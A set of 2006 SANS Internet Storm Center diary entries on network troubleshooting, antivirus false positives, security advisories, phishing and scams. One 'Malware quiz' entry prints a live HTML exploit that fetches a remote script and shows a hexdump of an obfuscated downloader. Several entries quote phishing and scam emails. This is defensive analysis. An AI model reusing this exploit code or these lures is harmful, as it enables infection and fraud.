        .... ...0 = ECN-CE: 0
    Total Length: 44
    Identification: 0x0000 (0)
    Flags: 0x04 (Don't Fragment)
        0... = Reserved bit: Not set
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x0a15 [correct]
        Good: True
        Bad : False
    Source: aa.bb.cc.dd (aa.bb.cc.dd)
    Destination: ee.ff.gg.hh (ee.ff.gg.hh)

Aha!!  There is something different in the "Differentiated Services Field" (previously known as the TOS byte).  So, a quick search on Google and I found RFC 791, that defined the original use of this, but I also found RFCs 1812, 2474, 2780, 3154, and 3168 which supersede 791 with respect to the usage of that byte in the IP header.  Interesting.  This also pointed me at http://www.iana.org/assignments/dscp-registry which describes the valid DSCP codepoints.  As ethereal had already told me, 0x01 is unknown (i.e., not defined in the registry).  Okay, now a quick look at the rules from the firewall and I see the following:

# Completed on Tue Mar  7 15:58:27 2006
# Generated by iptables-save v1.2.9 on Tue Mar  7 15:58:27 2006
:PREROUTING ACCEPT [64977797:109928599664]
:INPUT ACCEPT [64929633:109926287792]
:OUTPUT ACCEPT [68495493:123011914416]
:POSTROUTING ACCEPT [68435927:123006680932]
-A PREROUTING -i eth0 -p tcp -m tcp --sport 110 -j TOS --set-tos 0x04
-A PREROUTING -i eth0 -p tcp -m tcp --sport 1110 -j TOS --set-tos 0x04
-A PREROUTING -i eth0 -p tcp -m tcp --sport 465 -j TOS --set-tos 0x04
-A PREROUTING -i eth0 -p tcp -m tcp --sport 993 -j TOS --set-tos 0x04
-A PREROUTING -i eth0 -p tcp -m tcp --sport 995 -j TOS --set-tos 0x04
-A PREROUTING -i eth0 -p tcp -m tcp --sport 20 -j TOS --set-tos 0x08
-A PREROUTING -i eth0 -p tcp -m tcp --sport 21 -j TOS --set-tos 0x08
-A PREROUTING -i eth0 -p tcp -m tcp --sport 22 -j TOS --set-tos 0x10
-A PREROUTING -i eth0 -p tcp -m tcp --sport 25 -j TOS --set-tos 0x10
-A PREROUTING -i eth0 -p tcp -m tcp --sport 53 -j TOS --set-tos 0x10
-A PREROUTING -i eth0 -p tcp -m tcp --sport 80 -j TOS --set-tos 0x10
-A PREROUTING -i eth0 -p tcp -m tcp --sport 443 -j TOS --set-tos 0x10
-A PREROUTING -i eth0 -p tcp -m tcp --sport 512:65535 -j TOS --set-tos 0x04
-A PREROUTING -p tcp -m tcp --sport 443 -j TOS --set-tos 0x08
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 110 -j TOS --set-tos 0x04
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 1110 -j TOS --set-tos 0x04
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 465 -j TOS --set-tos 0x04
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 993 -j TOS --set-tos 0x04
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 995 -j TOS --set-tos 0x04
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 20 -j TOS --set-tos 0x08
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 21 -j TOS --set-tos 0x08
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 22 -j TOS --set-tos 0x10
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 25 -j TOS --set-tos 0x10
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 53 -j TOS --set-tos 0x10
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 80 -j TOS --set-tos 0x10
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 443 -j TOS --set-tos 0x10
-A POSTROUTING -o eth0 -p tcp -m tcp --dport 512:65535 -j TOS --set-tos 0x04
# Completed on Tue Mar  7 15:58:27 2006

Aha, the new version of the firewall is setting the TOS byte, and since the client is initiating the connection the partners firewall is setting it to 0x04 by the following rule (if the partner initiates, it would be getting set to 0x10)

-A POSTROUTING -o eth0 -p tcp -m tcp --dport 512:65535 -j TOS --set-tos 0x04

Okay, now we're getting somewhere, but why would that one bit cause the packet to be dropped and where was it getting dropped?

So, can we look upstream?

At this point, I asked my old team if they could take a look at the configs of the border router just outside the client firewall and see if we could see anything there that might be causing problems.  They got me a copy of the configs and a couple of things jumped out at me right away.

 policy-map mark-inbound-http-hacks
   class http-hacks
    set ip dscp 1

Hmm....  so the border router is setting the DSCP value to 1 for things that it believes are "http-hacks".  That looks pretty ominous.  And a little further down

route-map null_policy_route permit 10 
match ip address 106 
set interface Null0

access-list 106 permit ip any any dscp 1

And there we seem to have it, anything with a DSCP value of 0x01 is getting null-routed at our border router.  I talked to some of the network guys and they remembered putting this policy-map in.  In fact, this comes directly from Cisco (see http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml).  So that has been in the border routers form a long time (if not actually from Code Red, then not too long after).  By the way, for those that don't remember, Code Red was in 2001.  So, what we seem to have is the 2 endpoints of the TCP conversation using different interpretations of that TOS/DSCP byte in the IP header.  Also, that Cisco doc contains the following sentence, "This document uses a DSCP value of 1 (in decimal) since it is unlikely that any other network traffic is carrying this value" which would probably be true if no one was still using the old TOS interpretation of that byte.

So how do we finally solve it

Well, my cursory reading of RFC 2474, suggests that we shouldn't be calling this the TOS byte anymore.  That usage has been superseded.  Further, it appears that the DSCP value shouldn't really be propagated beyond the bounds of a single organization's administrative control.  Cisco has a couple of documents for service providers that recommends that the DSCP values be re-marked (the term used in RFC 2474) at administrative boundaries (lest someone try to run their traffic through the service provider's network with an artificially high priority).  So, one conclusion is that we should be sure we are clearing these bits when they leave or enter our administrative control.  The client is waiting on change control approval and debating whether to remove the policy-map completely or change the DSCP value to 3 (which is also undefined in the IANA registry mentioned above and doesn't conflict with any old TOS uses of that byte).  I'm sure there are lots of other conclusions that could be drawn from this, but for the moment, I'm not going to draw anymore.  I'll leave that to you, our faithful readers.


Jim Clausing, jclausing --at-- isc.sans.org


Published: 2006-03-13

Ubuntu install passwd in log


  * Tidy up after Malone bug #34606, which left passwords exposed in
    /var/log/installer/cdebconf/questions.dat, by removing those passwords;
    for good measure, make /var/log/installer/cdebconf/* world-unreadable if
    this bug is detected.




Published: 2006-03-13

Malware quiz

Some new malware sent in by a reader. Spaces and line breaks added
for readability and to prevent the accidental click.  The question is, what
is the malware, and what exploits were used?
Disclaimer, this is live malware, your anti-virus may trigger. I wouldn't recommend
running it anywhere except a vmware system that is isolated.

Download the first beastie:

wget http:// / cnt9_dycht5g.htm

What is it?:

file cnt9_dycht5g.htm

cnt9_dycht5g.htm: news or mail text

Check out the contents:

head cnt9_dycht5g.htm

From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

Try to decode it:

base64 -d cnt9_dycht5g.htm > yada.out

Illegal character ':' in input file.

Strip the illegal characters and try again:

base64 -d cnt9_dycht5g.htm > yada.out

What's in there?:

file yada.out
yada.out: HTML document text

HTML, lets take a looksee:

cata yada.out

< !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< OBJECT style="display:none" id="adswqe" classid="clsid:adb880a6-d8ff-
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value="
command;ms-its:c:/windows/help/ ntshared.chm:
<OBJECT style="display:none" id="adswqer" classid="clsid:adb880a6-d
< PARAM name="Command" value="Related Topics, MENU">
< PARAM name="Button" value="Text:_">
< PARAM name="Window" value="$global_blank">
< PARAM name="Item1" value='command; javascript:execScript("document.write(\"<
script src=http:// / cnt9.jpg
< script>adswqe.HHClick(); var vv=''; setTimeout("adswqer.HH
Click()",101); setTimeout("document.write(vv)",202); </script>
< /BODY>< /HTML>

Download the next beastie:

wget http:// / cnt9.jpg

and voila, malware:

AntiVir       03.13.2006      no virus found
Avast   4.6.695.0       03.10.2006      no virus found
AVG     718     03.10.2006      no virus found
Avira       03.13.2006      no virus found
BitDefender     7.2     03.13.2006      no virus found
CAT-QuickHeal   8.00    03.13.2006      no virus found
ClamAV  devel-20060126  03.11.2006      Trojan.Downloader.VBS.Phel.I
DrWeb   4.33    03.13.2006      VBS.Psyme.114
eTrust-InoculateIT      23.71.100       03.12.2006      no virus found
eTrust-Vet      12.4.2115       03.10.2006      no virus found
Ewido   3.5     03.13.2006      no virus found
Fortinet        03.12.2006      VBS/Phel.I-tr
F-Prot  3.16c   03.11.2006      no virus found
Ikarus        03.10.2006      no virus found
Kaspersky        03.13.2006      no virus found
McAfee  4716    03.11.2006      VBS/Psyme
NOD32v2 1.1440  03.12.2006      no virus found
Norman  5.70.10 03.10.2006      no virus found
Panda 03.12.2006      no virus found
Sophos  4.03.0  03.13.2006      no virus found
Symantec        8.0     03.13.2006      Download.Trojan
TheHacker       03.13.2006      no virus found
UNA     1.83    03.10.2006      no virus found
VBA32   3.10.5  03.13.2006      no virus found

So what are we?

file cnt9.jpg

cnt9.jpg: data

The strings in the file are:

strings cnt9.jpg


How about a hexdump?

hexdump -C cnt9.jpg

00000000  73 3d 22 43 10 1d 15 1a  1c 0b 5f 16 1b 42 1e 5f 
00000010  1c 13 1e 0c 0c 16 1b 42  1c 13 0c 16 1b 45 1e 1b 
00000020  1d 47 47 4f 1e 49 52 1b  47 19 19 52 4e 4e 1c 19 
00000030  52 46 4c 48 48 52 4f 4f  1e 1e 4f 4f 4c 1d 48 1e 
00000040  4e 4e 41 72 75 43 0f 1e  5c 72 1e 12 5f 11 1e 12 
00000050  1a 42 1c 10 12 12 1e 11  1b 5f 09 1e 13 5c 6e 1a 
00000060  42 0c 17 10 5c 72 0b 1c  5c 6e 0b 41 72 75 43 0f 
00000070  1e 5c 72 1e 12 5f 11 1e  12 1a 42 16 0b 1a 12 4e 
00000080  5f 09 1e 13 5c 6e 1a 42  58 53 1c 12 1b 51 1a 07 
00000090  1a 53 50 1c 5f 0c 0b 1e  5c 72 0b 5f 50 12 16 11 
000000a0  5f 1c 12 1b 51 1a 07 1a  5f 50 1c 5f 5d 1a 1c 17 
000000b0  10 5f 10 11 5f 1a 5c 72  5c 72 10 5c 72 5f 5c 72 
000000c0  1a 0c 5c 6e 12 1a 5f 11  1a 07 0b 5f 45 5f 0c 1a 
000000d0  0b 5f 10 5f 42 5f 3c 5c  72 1a 1e 0b 1a 30 1d 15 
000000e0  1a 1c 0b 57 5d 12 0c 07  12 5d 54 5d 13 4d 51 27 
000000f0  5d 54 5d 32 33 37 5d 54  5d 2b 2b 2f 5d 56 5f 45 
00000100  5f 10 51 10 0f 1a 11 5f  5d 38 5d 54 5d 3a 2b 5d 
00000110  53 5d 17 0b 0b 0f 45 50  50 47 4a 51 4d 4a 4a 51 
00000120  4e 4e 48 51 4c 4b 50 1c  11 0b 46 51 18 16 19 5d 
00000130  53 39 1e 13 0c 1a 5f 45  5f 10 51 0c 1a 11 1b 5f 
00000140  45 5f 0c 1a 0b 5f 0c 5f  42 5f 1c 5c 72 1a 1e 0b 
00000150  1a 10 1d 15 1a 1c 0b 57  5d 1e 1b 10 1b 5d 54 5d 
00000160  1d 51 0c 0b 5c 72 5d 54  5d 1a 1e 12 5d 56 5f 45 
00000170  5f 0c 51 0b 06 0f 1a 42  4e 5f 45 5f 0c 51 10 0f 
00000180  1a 11 5f 45 5f 0c 51 08  5c 72 16 0b 1a 5f 10 51 
00000190  5c 72 1a 0c 0f 10 11 0c  1a 3d 10 1b 06 5f 45 5f 
000001a0  0c 51 0c 1e 09 1a 0b 10  19 16 13 1a 5f 5d 3c 45 
000001b0  5d 54 5d 23 5d 54 5d 14  51 1a 5d 54 5d 07 1a 5d 
000001c0  53 4d 5f 41 5f 1c 45 23  1c 51 09 1d 0c 59 59 08 
000001d0  0c 1c 5c 72 16 0f 0b 5f  1c 45 23 1c 51 09 1d 0c 
000001e0  59 59 1b 1a 13 5f 1c 45  23 1c 51 09 1d 0c 59 59 
000001f0  16 19 5f 1a 07 16 0c 0b  5f 1c 45 23 14 51 1a 07 
00000200  1a 5f 0c 0b 1e 5c 72 0b  5f 1c 45 23 14 51 1a 07 
00000210  1a 5d 58 41 72 75 43 50  10 1d 15 1a 1c 0b 41 72 
00000220  75 72 75 43 0c 1c 5c 72  16 0f 0b 41 72 75 1e 51 
00000230  3c 13 16 1c 14 57 56 72  75 43 50 0c 1c 5c 72 16 
00000240  0f 0b 41 22 3b 66 6f 72  28 69 3d 30 3b 69 3c 35 
00000250  35 35 3b 69 2b 2b 29 73  3d 73 2e 73 75 62 73 74 
00000260  72 28 31 29 2b 53 74 72  69 6e 67 2e 66 72 6f 6d 
00000270  43 68 61 72 43 6f 64 65  28 31 32 37 2d 73 2e 63 
00000280  68 61 72 43 6f 64 65 41  74 28 30 29 29 3b 64 6f 
00000290  63 75 6d 65 6e 74 2e 77  72 69 74 65 28 73 29 3b 

So, what did we end up with?
Thanks to Mark for writing in with the malware du jour.

Bonus points for figuring out anything I missed, or didn't include here!


The fine print: no oompah loompahs were harmed in any way in the
creation of this diary entry.


Published: 2006-03-12

McAfee 4715 DAT False Positive Deletion Reports Follow-up

Friday we started receiving reports of file deletion problems from admins using McAfee AV, scans that were using the 4715 DAT's issued Friday were incorrectly identifying many executables as as W95/CTX virus. Portions of the information submitted are excerpted below, and we thank all of the admins who reported the problems which allowed us to get the early problem alert out. Your reports and the Diary warning McAfee/NAI rolls bad pattern helped many admins.

McAfee DAT 4716 corrects the problem, references W95/CTX and says;
"Users who have moved detected files to quarantine should restore them to their original location.  Windows users who have had files deleted should restore files from backup or use System Restore .

Virusscan Online users can restore the falsely detected file from the Manage Quarantined Files.."

ISC participants report excerpts;

"The 4715 dat files are incorrectly identifying multiple different files as being infected with W95/CTX when scanned with the on-demand scanner with the following products:

VirusScan Enterprise 8.0i
VirusScan Enterprise 7.1
VirusScan Enterprise 7.0
Managed VirusScan 4.0
Managed VirusScan 3.5
VirusScan Online 11
VirusScan Online 10
VirusScan 7.03 (consumer)

At this time you should cancel any scheduled on-demand scans until the release of the 4716 DATs."

"Some example files are graph9.exe and excel.exe from office 2000" "....3700 files have been quarantined on over 100 pcs."

"We think McAfee's latest DAT file may be bad.  They improved the detection for several variants of the W95/CTX virus, and now our scanners are detecting supposedly infected executables all over our network, including on an original Microsoft Office 11 CD.  Our guess is that this is a false positive.  If so, and your readers have quarantine or delete set as the default action, the Virusscan will do more damage than a real virus would."

"attempted to remove files such as Dell OpenManage, Cygwin, perl, Sysinternals pstools suite."

"anything that was in the PATH environment variable was targeted."

"Not only did it attempt to remove files in the %ORACLE_HOME%\bin directory, but also in the .patch_storage folder - so as far as oracle files, this was not limited to the PATH environment variable."

"This was also capable of navigating mapped drives, so if you had a file server setup as a common install location, if filesystem permissions permitted modification of such files, you'll want to refresh the installation files from the downloaded, compressed source file."

"[removed] ShavlikPro (commandline4.exe) and the entire SuperCACLs suite from trustedsystems.com"

"I started getting reports that looked lke a virus outbreak so I forced scans on all the network machines. This turned out to make matters worse because hundreds of files per machine were incorrctly identified as virus infected and quarantined. Many hours will be spent restoring these files from quarantine. Thankfully it was not set to delete the files."

"We had over 3700 quarantine events. I counted 297 individual file names."


Published: 2006-03-12

Phishing arms race

Arms Race ?

As with anything the bad guys do, they react to anything we do to try to prevent them from having success. One of the things we told our users was to ignore alerting messages that their bank (and any other bank they are not a customer of) seems to send them and tells them their account has been abused. It seems that it is finally having it's effect as the phishers are changing tactics.

These kind of arms races require us to increase awareness constantly and to make users more resilient all the time. If we fail this our users, customers, ... will fall prey and we will have failed our users and/or customers in the end.

Example of one of these new phishing attempts

From: Chase Manhattan Bank  
To: victim@example.com
Subject: [ $20 Reward Survey ]

Dear Chase Bank Customer,

You have been chosen by the Chase Manhattan Bank online department
to take part in our quick and easy 5 question survey.
In return we will credit $20 to your account - Just for your time!
Helping us better understand how our customers feel benefits everyone.
With the information collected we can decide to direct a number of
changes to improve and expand our online service.
We kindly ask you to spare two minutes of your time
in taking part with this unique offer!

SERVICE: Chase Online? $20 Reward Survey

EXPIRATION: March -  13 - 2006

Confirm Now your $20 Reward Survey with Chase Online? Reward

The information you provide us is all non-sensitive and anonymous
No part of it is handed down to any third party groups.
It will be stored in our secure database for maximum of 3 days
while we process the results of this nationwide survey.

Please do not reply to this message. For any inquiries, contact
Customer Service.

Document Reference: (87051203)
Copyright 1996 - 2006 Chase Bank, N.A. Member FDIC Copyright © 2006

It was formatted much more fancy in html, but I chose not to show that here.

Of course the link in there doesn't go to anything owned by JPMorgan Chase & Co.

Now let's have a look at that website collecting so called "non-sensitive and anonymous" information.

It starts out all rather innocent

but then it goes on to ask you more details. Details that are far from non-sensitive and anonymous. But remember the psychology: the user just has answered a whopping 5 questions and is now going to get his 20 bucks. He'll even sell his mother for it, or at least tell them her name along with what is going to cost him much more than that 20 bucks he'll never get.

The details they want to know:

New tactic: better servers

Unfortunately they are also getting better on the technology side:
  • "premium" service from a well known name on the Internet
  • very redundant DNS service
  • lots of servers
chaseonline.new-reward-survey.us. 600 IN CNAME  premium.geo.yahoo.akadns.net.
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A
premium.geo.yahoo.akadns.net. 300 IN    A

The not so good news goes on:

Worst of all the responses you receive when reporting these things to the abuse contacts of some service providers is so far below par that getting this shut down in a hurry isn't likely. I hope the banks have a bit more pull than this handler.

Yes I know that exposing this more publicly will increase the odds that other rivaling groups will start to use these techniques as well, but after having received half a dozen of these myself my guess is that they already know.

Swa Frantzen - Section 66


Published: 2006-03-11

peercast update and exploit

A Security Update: version v0.1217  has been released for peercast it addresses a serious vulnerability.

"PeerCast is a simple, free way to listen to radio and watch video on the Internet. It uses P2P technology to let anyone become a broadcaster without the costs of traditional streaming."

"This fixes a serious buffer overrun vulnerability discovered by Leon at INFIGO IS (http://www.infigo.hr/) many thanks to them for alerting us promptly."

An exploit for this vulnerability has been publicly released


Published: 2006-03-11

acts of terrorism trojan

Don't open zips you get in the mail.
Today's gem claims to be video about new acts of terrorism.
Attached to the email was a 47KB zip file news.zip.
Inside news.zip is news.exe.
But its a trojan, of course.
Only about half of the av scanners recognized it.
Those that did identified it as a trojan downloader of some sort

TEXT of the virus message:

From: BBC World News [mailto:news@info.bbc.com]
Sent: Fri 3/10/2006 7:24 PM
To: Smith, Donald
Subject: New acts of terrorism in New York and London

Today FBI and SCOTLAND YARD has informed on set of new acts of terrorism
in New York and London. On a communique was lost more than two thousand person
and about ten thousand have received the wounds which were much of them are in
a grave condition.Police and MI5 identified an Al-Qaeda cell that had carried
out extensive research and video-recorded reconnaissance missions in preparation
for the attack. You can learn the detailed information in the attached file.


Published: 2006-03-11

What crime is this?

Thanks to Bob, Nathanial, Greg for the help and expert analysis. We received an email similar to this:

= = =
Hi there lovely,I was searching the net few days ago and 
saw your profile. I decided to email you cause I found you
attractive. I might come down to your city infew weeks.
Let me know if we can meet each other in person.I am
attractive girl. I am sure you won't regret it. Reply to
my personal email at ***.
= = =

It was clearly spam, but what is the crime? So a couple of us responded back via throwaway accounts. We each received emails with pictures of a pretty girl with text similar to this:

= = =
Hello my lonely boy,I am so happy to see that you have 
decided to reply. I don't want to live in Russia because
I have not any chances here. My best friend last year met
the man from the USA when she worked there for three months,
too. She had two jobs. From morning till 4 pm she worked in
amusement park and after it she worked as a waitress in some
bar till midnight. I will leave Russia in two weeks or so
(I can't tell you everything exactly right now) and I would
like to be sure that I have the man who waits for me there.
I will work all day and I want to find a man to spend all
free time together to get to know each other better. If you
have any interest to meet me I will be more than happy to
meet you too. Please send picture of you too!!! Now I write
you from my personal mailbox(***), please write me back here
and here only. I will be checking it often.

Kiss you your Elena, (this is my name)
= = =

The scam: get lonely gullible men to wire money so that beautiful Russian women can fly here to work hard by day and date them by night. And of course the money disappears and no girl. It might not hurt to update your awareness programs, or add this to your next awareness email blast. Other links the research team found include:


Perhaps the funniest thing, the pictures of the "pretty girl" apparently are Canadian, not Russian, but who can know. Thanks to everyone and we consider the case closed.

Stephen Northcutt - President
The SANS Technology Institute


Published: 2006-03-11

McAfee/NAI rolls bad pattern

NAI/McAfee today released pattern version 4716 only hours after 4715 had come out. Pattern 4715 triggered false positive virus alerts for "W95/CTX" on a number of files that are part of quite prominent third party products.  Good for you if you have your AV configured to "quarantine" bad files and not to delete them outright, this makes restoring the chewed up files after a false positive considerably faster. Nevertheless, things like this can get messy pretty quickly if the AV scanner starts to quarantine vital components of your environment.

If you weren't affected and/or are using a different AV product, it might still be worthwhile to spend a couple of minutes on the following questions:
  • How would you detect such a "bad pattern" in your environment, and, more importantly, how would you distinguish between "false positive" and "virus outbreak" ?
  • Would you have the capability to roll back to the last "known good" pattern if help from the vendor were not forthcoming ?  Where exactly do these patterns come from ?  Is the previous pattern version available there as well ?


Published: 2006-03-10

Flaw with GPG Signature Verification

There is a flaw with how GPG does verification of signatures that are attached to the signed data.

From the posting to the gnupg-announce mailing list:

"Signature verification of non-detached signature may give a positive result but when extracting the signed data, this data may be prepended or appended with extra data not covered by the signature.  Thus it is possible for an attacker to take any signed message and inject extra arbitrary data."

OpenPGP messages (this can be a file or an email message) can contain multiple data segments each with their corresponding signature segment.  If all of the data segments are untampered, then all of the corresponding signatures check out and the message as a whole is considered to have a valid signature.  If any of the data segments have been tampered, then that specific signature segment fails and the entire message is considered to have an invalid signature.

The flaw comes in to play when someone inserts unsigned data into the OpenPGP message either before the data segment or after the signature segment.  As long as all of the signed message segments check out as ok, the entire message is still considered to be validly signed even if extraneous data is included.

For folks who download software or other files from FTP/HTTP servers where a GPG/PGP signature of the download file is provided as a seperate file, the signature verification can still be trusted.

The recommendation for this flaw is to upgrade to the latest version of GnuPG (version  All prior versions are affected.

You can see the entire gnupg-announce post here.


Published: 2006-03-09

Spam ahoy!

This PR release slides nicely right into our current poll on how much spam a typical organization receives.  The Messaging Anti-Abuse Working Group has estimated that about 80%-85% of all e-mail is spam or malicious.  36% of respondents in our poll reported more than 75% with the rest being split between 50-75%, 10-50% and less than 10%.  This highlights the need to practice safe shopping online (see below, don't buy from spammers, it's bad for you) and to filter malicious e-mail.  Phishing, spyware, and e-mail viruses have all become vectors of doing one thing, seperating consumers from their money.  While I'm not going to be a doomsayer and say e-mail is dead, I will say this behavior will only increase and continue as long as it is successful.


Published: 2006-03-09

Safer Online Shopping Guide

Mostly because I was interviewed a few days ago about it and then realized there should be a basic guide like this, I wrote a one-pager designed towards end-users on basic ways to shop online safely.  For people in the business, this should all be known and well-used stuff, but unfortunately the general consumer doesn't necessarily practice these steps.  While online shopping in the end doesn't impact the consumer as much as it could (the banks end up eating fraud) they are the first, last, and best line of defense against information disclosure of consumer info.  Here's the guide.

While this goes a long way to protecting the low-hanging fruit, the industry has a long way to go to build an intelligent infrastructure to prevent massive identity theft from online transactions.  Send comments to bambenek -at- gmail -dot- com.  I do accept gratuities in the form of adult beverages if you are even in scenic and beautiful Champaign, Illinois.

Note: Thanks for the feedback, fixed some typos and added some clarifications. 

If you want to put this on your website or distribute to users, feel free that's what this is for. Distribute it far and wide, translate it, do whatever you want.  Just credit me and the ISC because we like the good press, you don't need advance permission from me. :)


Published: 2006-03-09

Microsoft Patch Tuesday Advance Notice

Microsoft released their advance bulletin today.  Looks like it will be a light month with only one critical update for Microsoft Office and only an important updated for Windows itself.  All in all it looks like a light month this month.


Published: 2006-03-08

Bargain: 10'000 infected PC's for only 25$

Just got this one, sent in by a reader who received it as email:

Dear Sir/Madam, Hello! We are internet hackers crew. We propose you for sale some interesting things: - private exploits - http://some.site.in.ru - stolen credit cards and bank accounts - http://some.site.in..ru - we infect users pc's with your trojan for low prices (10000 infected pc's for 25$) - http://some.site.in.ru - bulletproof dmains and hosting - http://some.site.in.ru Best offer - bulletproof domain + hosting =0 usd/week. You can use this hosting for any scam/fraud and nobody will close it! For more information look at - http://some.site.in.ru P.S. We are registering bulletproof domains on our partner site http://www.other.site.in.ru/ there we have "our" people to guarantee stability of our domains and hosting so any organization like spamhaus.org cannot down our hosting and domains. We are now spaming 5 000 000 people look out the domain is alive as always and never gonna be down !! Please go and order our services at: http://some.site.in.ru

(I have disguised the domain, of course, for apparent reasons)


Published: 2006-03-08

"Free" exchange rate conversion

This one is for our readers in Europe... If one of your users should be searching for a "currency" or "exchange rate" conversion tool with one of the more popular search engines, chances are he/she will end up on a link or site like this one

Maybe it's best if you don't go there now - we can't vouch for what the page does once they become aware that their "tool" is mentioned in our diary. What the page used to do as of 10min ago is present the user with a lovely, extensive and complete list of currencies and exchange rates to convert from and to. All for free. The only catch being, the user gets the "result" of his calculation as ... an EXE download

The download contains what some of the AV vendors refer to as Dropped:Trojan.Downloader and Trojan.Muldrop.  If you are using any sort of URL filter, web-url.de and wechselkursrechner.de should maybe be part of your filter list if exe downloads make it past your perimeter otherwise.


Published: 2006-03-07

Cingular wireless outage

Our reader Kevin alerted us that Cingular Wireless is experiencing a widespread outage.

Right now, it looks like the outage effects mostly the north east. One reader mentioned that Cingular links the outage to a worm.


Published: 2006-03-07

Probes for Cisco Web Interface

The Philippine Honeynet project is detecting an uptick in scans for Cisco web access. The tool most likely used is ciscoscanner v 0.2. See the full analysis for details, and thanks to Ryan Talabis for pointing this out to us.

Reminder: It is a good idea to disable all unused remote access options, in particular unencrypted access like HTTP. If you must have unencrypted access enabled, limit it to trusted IP addresses that access the device over a trusted network.


Published: 2006-03-07

Apple Security Update 2006-001 (more details)

Apple released its 2006-001 security update last week, and we covered it briefly as it was released. However, we didn't exactly explain the patches in much detail. Apple's advisories only include a one or two sentence summary of each patch, which is insufficient to judge the severity of each patch. Potential impacts, mitigating factors and details are not discussed. In particular if you consider deploying OS X systems in larger installations, you should carefully study past advisories to decide if the detail provided will suffice to make intelligent patching decisions. For a home user, enabling automatic patching and follow a "patch and pray" approach is probably the best solution.

For Apple's version, see the "Security Update 2006-001"

apache_mod_php patch

This patch will move php to version 4.4.1. Sadly, php 4.4.2 is the most recent version of php as of this writing. The most important fixes implemented by version 4.4.1 are related to file upload handling and safe_mode issues. The impact of these vulnerability is severe for shared hosting environments. However, if you rely on protections provided by safe_mode for your own code, this upgrade is critical. You may want to consider compiling mod_php yourself using the sources found at php.net. this requires some experience in configuring and compiling a complex package like php and any custom php compile should be carefully tested before using it in a production environment.

Of course, the easiest way to mitigate this vulnerability is to disable Apache. Apache is not enabled by default. Even if you use Apache (and php) for development on your OS X desktop, you can limit it to listen on only, or you may firewall the port.

This patch is in particular critical, as the vulnerability is known for a few months now. It has been patched in php since Oct. 31st 2005.


"automount" is used to automatically mount local and remote file systems. The vulnerability is triggered if a remote file server uses a reserved name. Unfortunately, there is no third party advisory to provide more details. For example, it would be nice to know what configuration will allow such a file system to be mounted automatically. The advisory is mute to this point, but states that arbitrary code execution is possible. The advisory fails to note that automount is running as root and is missing any other mitigating configuration (e.g. chroot environment) which would limit the impact of an exploit.


BOM, a framework used to unpack files, the advisory fails to note which files are unpacked by BOM (btw: BOM appears to be shorthand for "Bill of Materials"). BOM will not check path names of unpacked files carefully enough, allowing malicious archives to write files to arbitrary locations accessible to the user.
Its a bit hard to tell how severe this is. It looks like this requires downloading a malicious archive, and expanding it. iDefense is providing more details. It advises to disable "open safe file types" in Safari to mitigate this issue. Important information that should have been included in Apple's advisory. 

Directory Services (passwd)

The title may be a bit odd, given that this is a vulnerability in the 'passwd' command. Apple suggests a temporary file vulnerability. These issues are common and usually refer to temporary files which are created by root, but not secured against overwriting. An attacker with access to the system could overwrite the file, and use it to executed arbitrary commands. A complete discussion of this issue can be found at iDefense and it provides for important details. The OS X passwd command allows the user to specify a password database name. This database name is not checked careful enough. As a result (remember: passwd runs as root) the user will be able to create arbitrary files. A second vulnerability exists in that "passwd" creates temporary files with predictable file names, allowing users to mount "symlink attacks".

iDefense also provides a simple workaround: Remove the "suid" bit from "/usr/sbin/passwd". This will prevent regular users from using "passwd" to elevate privileges. However, it will also prevent them from changing their password. Likely a sensible workaround while the patch is validated. You may want to use this opportunity to remove the suid bit from other binaries if you can do so.

File Vault

The 'filevault' encrypts a users home directory. This is a valuable feature in particular for notebooks and other physically vulnerable systems. As most file encryption schemes, it provides little additional protections for servers/remote exploits if the encrypted disks is mounted at all times. This vulnerability only exposes the protected files while the encrypted image is created. Apple does not detail the vulnerability. Later in the "security improvement" sections, Apple also refers to stricter permissions on the encrypted disk image.

The impact is likely minimal, as the exposure window is limited. However, hard to tell without more details.


This patch fixes a denial of service (DoS) condition that could be used to disconnect a VPN tunnel. Could be bad if this is a business critical tunnel (e.g. to a remote database?). Based on the credits, this looks like fallout from a test suite developed last year. While this is not a critical remote code execution vulnerability, it is nice that Apple is getting around to fix it.


Libsystem is the central systems library in OS X. It includes input/output functions, math libraries and other fundamental functions. Each OS X executable will use Libsystem. A vulnerability in this fundamental library is very critical as there may be numerous execution paths to trigger it. A full advisory can be found at the SureSec website.

There is no good workaround. This vulnerability could be used to escalate local privileges.


Mail suffers from the same 'safe file' issue as Safari. A file can be disguised as safe (e.g. as an image or a movie). This can be used to trick the user to click on the "image" to view it. As the user clicks on the file, it is executed without further warning. This issue is more of a problem in Safari (see below) and has been known for a couple weeks now.


Perl can be asked to drop "root" privileges and to continue to run as a regular user, after it performed a function that requires it to run as root (e.g. if may need to open a listening socket at a port < 1024). In order to achieve this, the perl command "$< = $UID" is used, where $UID is the numeric user id of the less privileged user. This problem has been known publicly until December 2005.

There is no good workaround. But again, if you don't have to run as root don't do it. However, dropping privileges after an initialization phase is typically the right way to avoid running as root.


rsync can be used to synchronize files with remote systems. It is a very efficient method to keep remote systems in sync with each other. The vulnerability appears to allow arbitrary code execution.
